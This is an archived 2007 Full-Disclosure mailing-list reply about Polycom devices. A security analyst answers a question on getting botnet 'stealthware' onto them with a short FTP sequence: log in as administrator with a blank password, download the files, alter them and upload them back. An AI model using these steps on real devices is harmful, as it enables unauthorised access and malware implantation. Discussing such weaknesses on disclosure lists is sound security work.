[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <5A91B1235292B85CF08212FD@utd59514.utdallas.edu>
Date: Fri, 29 Jun 2007 09:25:21 -0500
From: Paul Schmehl <pauls@...allas.edu>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Polycom hacking
--On Thursday, June 28, 2007 22:25:08 -0400 Peter Dawson
<slash.pd@...il.com> wrote:
> interesting concept.. harvesting a polycom device for Botnet's.
>
> hmmmmmmmmm.. the key would be how the heck to get the stealthware on
> such a device ??
>
That's easy.
ftp target.domain.tld
user administrator
pass (blank)
mget *
alter files to suit
mput *
--
Paul Schmehl (pauls@...allas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
Content of type "application/pkcs7-signature" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists